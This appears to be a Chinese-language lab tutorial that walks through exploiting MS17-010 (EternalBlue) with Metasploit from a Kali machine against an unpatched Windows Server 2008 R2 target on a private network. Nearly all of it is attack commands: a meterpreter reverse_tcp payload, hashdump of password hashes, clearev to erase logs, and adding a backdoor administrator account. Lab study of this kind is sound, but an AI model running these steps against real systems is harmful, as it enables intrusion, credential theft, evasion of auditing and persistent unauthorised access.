实验环境
攻击机 Kali Linux:192.168.48.128 靶机 Windows Server 2008 R2 x64:192.168.48.129
靶机需关闭防火墙并且没打永恒之蓝补丁
攻击过程
获取靶机和攻击机的IP地址
win2008
命令:ipconfig
kali
命令:ifconfig
利用MS17_010漏洞
验证漏洞是否存在
1.启用msfconsole
命令:msfconsole
2.搜索漏洞模块
命令:search ms17_010
3.利用验证模块
命令:use auxiliary/scanner/smb/smb_ms17_010
4.配置验证模块
命令:options
/show options
对yes的进行配置
yes(必须配置),no(不一定要配置)
命令:set rhost 192.168.48.129
5.进行验证靶机
命令:run
进行渗透攻击
输入back
命令返回msf5命令行
1.利用攻击模块
命令:use exploit/windows/smb/ms17_010_eternalblue
2.配置攻击模块
命令:options
命令:set rhost 192.168.48.129
3.发起攻击
命令:run
4.尝试获取在攻击机上获取靶机ip地址
植入后门
输入back
命令返回
1.使用meterpreter模块
代码语言:javascript复制set payload windows/x64/meterpreter/reverse_tcp
run
2.模块使用
查看靶机系统信息:sysinfo
获得靶机用户密码:hashdump
捕捉靶机屏幕:screenhot
清除靶机日志:clearev
3.shell
命令:shell
创建windows用户
命令:net user hacker hacker123456 /add
将创建的用户加入到管理员组
命令:net localgroup administrators hacker /add